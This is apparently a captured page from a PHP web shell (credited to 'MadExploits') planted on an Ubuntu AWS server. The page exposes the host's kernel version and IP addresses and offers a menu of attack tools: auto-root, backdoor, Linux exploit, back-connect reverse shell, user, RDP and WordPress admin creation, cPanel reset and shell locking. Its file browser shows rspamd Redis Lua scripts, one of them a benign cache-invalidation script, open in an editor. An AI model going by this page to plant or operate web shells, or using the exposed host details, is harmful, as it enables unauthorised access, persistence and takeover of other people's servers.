Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.217.140.32
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
rspamd /
lualib /
redis_scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
bayes_cache_check.lua
542
B
-rw-r--r--
bayes_cache_learn.lua
1.74
KB
-rw-r--r--
bayes_classify.lua
1.21
KB
-rw-r--r--
bayes_learn.lua
1.46
KB
-rw-r--r--
bayes_stat.lua
554
B
-rw-r--r--
neural_maybe_invalidate.lua
754
B
-rw-r--r--
neural_maybe_lock.lua
567
B
-rw-r--r--
neural_save_unlock.lua
744
B
-rw-r--r--
neural_train_size.lua
594
B
-rw-r--r--
ratelimit_check.lua
3.26
KB
-rw-r--r--
ratelimit_cleanup_pending.lua
1.09
KB
-rw-r--r--
ratelimit_update.lua
3.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : neural_maybe_invalidate.lua
-- Lua script to invalidate ANNs by rank -- Uses the following keys -- key1 - prefix for keys -- key2 - number of elements to leave local card = redis.call('ZCARD', KEYS[1]) local lim = tonumber(KEYS[2]) if card > lim then local to_delete = redis.call('ZRANGE', KEYS[1], 0, card - lim - 1) if to_delete then for _, k in ipairs(to_delete) do local tb = cjson.decode(k) if type(tb) == 'table' and type(tb.redis_key) == 'string' then redis.call('DEL', tb.redis_key) -- Also train vectors redis.call('DEL', tb.redis_key .. '_spam_set') redis.call('DEL', tb.redis_key .. '_ham_set') end end end redis.call('ZREMRANGEBYRANK', KEYS[1], 0, card - lim - 1) return to_delete else return {} end
Close